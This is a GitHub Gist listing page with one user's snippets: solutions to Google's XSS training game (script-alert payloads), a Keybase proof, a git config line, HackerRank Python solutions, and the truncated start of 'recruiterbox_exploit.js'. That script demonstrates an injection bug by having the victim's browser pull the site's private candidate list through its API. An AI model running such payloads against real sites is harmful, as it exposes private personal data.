Skip to content

Instantly share code, notes, and snippets.

@djadmin
djadmin / XSS-Game Solutions
Created March 15, 2015 15:31
Google's XSS-Game Solutions
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/
########################## Level 1: Hello, world of XSS ##########################
*** Query ***
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
*** Vector ***
<script>alert(1)</script>
########################## Level 2: Persistence is key ##########################
@djadmin
djadmin / recruiterbox_exploit.js
Last active August 10, 2016 09:10
Recruiterbox.com HTML Injection Exploit
// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
var candidates = [];
var request = new XMLHttpRequest();
request.open('GET', '/api/v1/candidates/', true);
request.onload = function() {
var data = JSON.parse(request.responseText);
console.log(data);
candidates = data && data.objects;
var profile = candidates.find(function (cand) {
return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';

Keybase proof

I hereby claim:

  • I am djadmin on github.
  • I am djadmin (https://keybase.io/djadmin) on keybase.
  • I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo

To claim this, I am signing this object:

@djadmin
djadmin / config
Created January 16, 2016 15:14
Sync master with gh-pages branch
$ vim .git/config
push = +refs/heads/master:refs/heads/gh-pages
push = +refs/heads/master:refs/heads/master
@djadmin
djadmin / uk-and-us
Created August 23, 2013 07:03
HackerRank- The British and American style of Spelling https://www.hackerrank.com/challenges/uk-and-us
TEXT=''
sum=0
N=int(raw_input())
for i in xrange(N):
TEXT+=' '+str(raw_input())
T=int(raw_input())
for i in xrange(T):
FIND=str(raw_input())
print TEXT.count(FIND)+TEXT.count(FIND[:-2]+'se')
count=0
for i in xrange(input()):
text=str(raw_input())
if 'hackerrank' in text.lower():
count+=1
print count
languages=['C','CPP','JAVA','PYTHON','PERL','PHP','RUBY','CSHARP','HASKELL','CLOJURE','BASH','SCALA','ERLANG','CLISP','LUA','BRAINFUCK','JAVASCRIPT','GO','D','OCAML','R','PASCAL','SBCL','DART','GROOVY','OBJECTIVEC']
for i in xrange(input()):
input=str(raw_input()).split()
language=input[1]
if language in languages:
print 'VALID'
else:
print 'INVALID'
import re
for i in range(input()):
text=str(raw_input())
if re.search(r'^(hi [^d])',text,re.IGNORECASE):
print text
import re
for i in xrange(input()):
pan=str(raw_input())
if re.search(r'[A-Z]{5}[0-9]{4}[A-Z]',pan):
print 'YES'
else:
print 'NO'
import re
N = int(raw_input())
for i in xrange(N):
T=str(raw_input())
if re.search(r'^hackerrank',T) and re.search(r'hackerrank$',T):
print 0
elif re.search(r'^hackerrank',T):
print 1
elif re.search(r'hackerrank$',T):